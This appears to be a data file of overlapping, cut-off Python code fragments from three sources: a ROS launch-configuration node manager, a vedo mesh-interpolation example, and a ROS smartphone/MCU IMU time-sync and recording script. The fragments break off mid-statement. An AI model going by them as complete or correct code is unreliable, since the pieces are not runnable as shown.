"cap.namespace = ns cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description",
"# are met: # # * Redistributions of source code must retain the",
"file # ''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally:",
"len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description']",
"0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay')",
"# the name of nodes with namespace self.sensors = {} # sensor descriptions",
"= dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass #",
"for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) >",
"WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE",
"string, if the C{file} is an absolute path @type package: C{str} @return: the",
"info local namespace sys.argv = list(argv) # set the global environment to empty",
"import std_srvs.srv import subprocess import sys import threading from .screen_handler import ScreenHandler #",
"with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the",
"name of Fraunhofer nor the names of its # contributors may be used",
"to set parameter: %s\" % (msg)) except Exception: raise # re-raise as this",
"= dict() for param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\",",
"None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path,",
"parameter namespaces # #2468 unify clear params to prevent error for p in",
"_get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0.",
"service to start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.)",
"node_manager to update the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation)",
"package raise StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle different result",
"# import traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for",
"= self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict() for (ns, groups)",
"found ''' launch_file = path # if package is set, try to find",
"> 0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description']",
"the currently loaded configuration. @param node: the name of the node @type node:",
"for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} #",
"in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name",
"HOME path depending on ROS distribution API. @return: ROS HOME path @rtype: C{str}",
"original on error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding())",
"= threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file)",
"is not found ''' launch_file = path # if package is set, try",
"reproduce the above # copyright notice, this list of conditions and the following",
"TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE",
"result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if ns == cap_ns",
"self.masteruri # if n.machine_name and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name]",
"set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = []",
"self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file:",
"# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL,",
"rospy.logwarn('Private for autostart required topic `%s` is ignored!' % topic) topic = ''",
"OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR",
"cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode:",
"@return: ROS master URI @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename()",
"for a in argv: in_filter = False for f in afilter: if a.startswith(f):",
"= n.launch_prefix if n.launch_prefix is not None else '' args = ['__ns:=%s' %",
"# # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #",
"cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap)",
"if item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace,",
"the parameter server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib",
"services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description)",
"roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names import",
"rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except:",
"std_srvs.srv import subprocess import sys import threading from .screen_handler import ScreenHandler # ,",
"DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT",
"master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now",
"coding as system default @type val: str @return: the decoded string @rtype: C{unicode}",
"environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' %",
"sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri =",
"param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG",
"in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0])",
"list): if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name',",
"''' Returns the master URI depending on ROS distribution API. @return: ROS master",
"rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] =",
"the timer for waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd,",
"LoadException(Exception): ''' The exception throwing while searching for the given launch file. '''",
"the namespace of the node if ns not in result[machine_name]: result[machine_name][ns] = dict()",
"if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env,",
"is in exclude list, skip autostart\", n.name) return # env = n.env_args prefix",
"entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images",
"in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or",
"from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv",
"[]} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname)",
"from pending autostarts try: self._pending_starts.remove(node) except: pass # print the current pending autostarts",
"if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s] not",
"specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT",
"dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add"
] |
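A minimal driver for this class, as a sketch only: the script body, the module path default_cfg_fkie.default_cfg and the way the parameters are supplied are assumptions for illustration, not taken from the code above.

#!/usr/bin/env python
# Hypothetical entry-point sketch (module path is assumed): initialize the
# node, build the configuration handler and load the configured launch file.
import rospy
from default_cfg_fkie.default_cfg import DefaultCfg  # assumed import path

if __name__ == '__main__':
    rospy.init_node('default_cfg')
    cfg = DefaultCfg()  # reads ~launch_file, ~package, ~autostart, ...
    cfg.load()          # parses the launch file, creates ~run and ~list_nodes
    rospy.spin()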
"""Interpolate cell values from a quad-mesh to a tri-mesh"""
from vedo import Grid, show

# Make up some quad mesh with associated scalars
g1 = Grid(res=(25,25)).wireframe(0).lw(1)
scalars = g1.points()[:,1]
g1.cmap("viridis", scalars, vmin=-1, vmax=1, name='gene')
g1.mapPointsToCells()  # move the array to cells (faces)
g1.addScalarBar(horizontal=1, pos=(0.7,0.04))
g1.rotateZ(20)  # let's rotate it a bit so it's visible

# Interpolate first mesh onto a new triangular mesh
eps = 0.01
g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0)
g2.triangulate()

# Interpolate by averaging the closest 3 points:
#g2.interpolateDataFrom(g1, on='cells', N=3)

# Interpolate by picking points in a specified radius,
# if there are no points in that radius set null value -1
g2.interpolateDataFrom(
    g1,
    on='cells',
    radius=0.1+eps,
    nullStrategy=1,
    nullValue=-1,
)

g2.cmap('hot', 'gene', on='cells', vmin=-1, vmax=1).addScalarBar()

show(g1, g2, __doc__, axes=1)
"so it's visible # Interpolate first mesh onto a new triangular mesh eps",
"there are no points in that radius set null value -1 g2.interpolateDataFrom( g1,",
"quad mesh with associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars,",
"bit so it's visible # Interpolate first mesh onto a new triangular mesh",
"cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate it a bit so it's",
"# move the array to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate",
"Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by averaging the closest 3 points: #g2.interpolateDataFrom(g1,",
"value -1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot', 'gene', on='cells', vmin=-1,",
"# Interpolate by picking points in a specified radius, # if there are",
"if there are no points in that radius set null value -1 g2.interpolateDataFrom(",
"# Interpolate by averaging the closest 3 points: #g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate"
]
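De-shingled for readability: the overlapping 12-token n-grams in the row above reassemble into one short vedo example script (the leading <gh_stars>1-10 token is repository metadata, not code). The sketch below is a best-effort reconstruction: every statement is stitched verbatim from the row's own fragments, the camelCase calls (interpolateDataFrom, mapPointsToCells, addScalarBar) match an older vedo release, and the trailing arguments of the final show(...) call are cut off in this row, so the call is closed minimally here rather than guessed.

"""Interpolate cell values from a quad-mesh to a tri-mesh"""
from vedo import Grid, show

# Make up some quad mesh with associated scalars
g1 = Grid(res=(25,25)).wireframe(0).lw(1)
scalars = g1.points()[:,1]
g1.cmap("viridis", scalars, vmin=-1, vmax=1, name='gene')
g1.mapPointsToCells()  # move the array to cells (faces)
g1.addScalarBar(horizontal=1, pos=(0.7,0.04))
g1.rotateZ(20)  # let's rotate it a bit so it's visible

# Interpolate first mesh onto a new triangular mesh
eps = 0.01
g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0)
g2.triangulate()

# Interpolate by averaging the closest 3 points:
#g2.interpolateDataFrom(g1, on='cells', N=3)

# Interpolate by picking points in a specified radius,
# if there are no points in that radius set null value -1
g2.interpolateDataFrom(
    g1, on='cells',
    radius=0.1+eps,
    nullStrategy=1,
    nullValue=-1,
)

g2.cmap('hot', 'gene', on='cells', vmin=-1, vmax=1).addScalarBar()

# The row's n-grams end mid-call; the original script likely passes
# further layout options (not recoverable from this row) to show().
show(g1, g2, __doc__)

Two details worth noting in the reconstruction: the small padding in radius=0.1+eps keeps cells sitting exactly on the 0.1 search boundary inside the interpolation neighborhood, and, per the script's own comment, nullStrategy=1 with nullValue=-1 marks cells that found no donor points instead of leaving them undefined.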
[
": M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' :",
"remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute",
"# Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering",
"import matplotlib.pyplot as plt import signal import sys import select import os HOST",
"print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST =",
"'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({",
"pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts],",
": M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path,",
"record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop",
"index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize",
"= \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num",
"if (value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common",
"'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12'",
"address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN",
"ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy",
"indicate the next sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0] if",
"msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1",
"'\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m'",
"data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp",
"debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data,",
"+ 'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL",
"= sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration",
"'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22'",
"break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration",
"to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3.",
"while True: input = select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip()",
"1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' #",
"# 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is",
"subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along",
".launch launched completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment process')",
"src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import",
"main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration)",
"path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t,",
"(path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \"",
"matplotlib.pyplot as plt import signal import sys import select import os HOST =",
"calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is",
"= sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \", comp_delay2",
"+ \\ '\\n' ) ''' # Added for debugging path = '/'.join( ('out',",
"import StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot",
"Imu, CameraInfo, TimeReference import numpy as np import pandas as pd from io",
"SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list:",
"mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data,",
"None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs +",
"Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in",
"mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None remote",
"Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some",
"1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global",
"1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq ==",
"None # The smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE =",
"rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past =",
"sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote remote = RemoteControl(HOST)",
"IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded",
"smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN =",
"for p in running_subpr_list] if remote is not None: try: remote.stop_video() except: pass",
"= depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start video on",
"\", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period",
"print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period",
"time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister()",
"def main(args): if len(args) == 1: print 'Please, provide smartphone IP-address. For instance,",
"FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def",
"def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common",
"[comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00'",
"nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely",
"4 # Wait to avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU",
"timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print \"comp_delay2",
"def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC)",
"time from src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy",
"time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync has succeeded if",
"+ time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) +",
"'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame",
"[], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master',",
"BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER",
"Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length],",
"sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while",
"\"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \",",
"#print(gyro_data[:200]) # Show the problem of the first measurement # Get data from",
"+ comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of",
"if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister()",
"from io import StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg')",
"\\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' +",
"and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global",
"10.30.65.166' sys.exit() global HOST HOST = args[1] # Register SIGINT handler def signal_handler(sig,",
"min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length]",
"data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global",
"= None # The smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE",
"until .launch launched completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment",
"smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future",
"#mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys import select import os",
"indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if __name__ == '__main__':",
"time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check",
"message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() #",
"Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback)",
"Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \",",
"import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import",
"import time from src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import",
"print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list =",
"[] for subpr in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes",
"None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3:",
"+ string + bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data = []",
"anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration = 4",
"to indicate the next sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0]",
"'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02'",
"'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False)",
"= executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener()",
"0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference()",
"sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset",
"3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress",
"the problem of the first measurement # Get data from s10 imu sm_df",
"as plt import signal import sys import select import os HOST = None",
"publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection",
"TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num)",
"== None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout reached. Exiting')",
"mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera",
"start recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts",
": M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' :",
"msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start video",
"plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera",
"str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1)",
"to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0] if input:",
"[], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg =",
"HOST HOST = args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list",
"sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref",
"= TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source =",
"subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np",
"'\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m'",
"= 4 # Wait to avoid shaking time.sleep(1) # Gathering MCU and smartphone",
"str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for",
"bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time",
"mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1:",
"# Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract",
"Show mean of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1))",
"matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys import",
"= np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2)",
"as np import pandas as pd from io import StringIO from src.TimeSync import",
"future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True, False)",
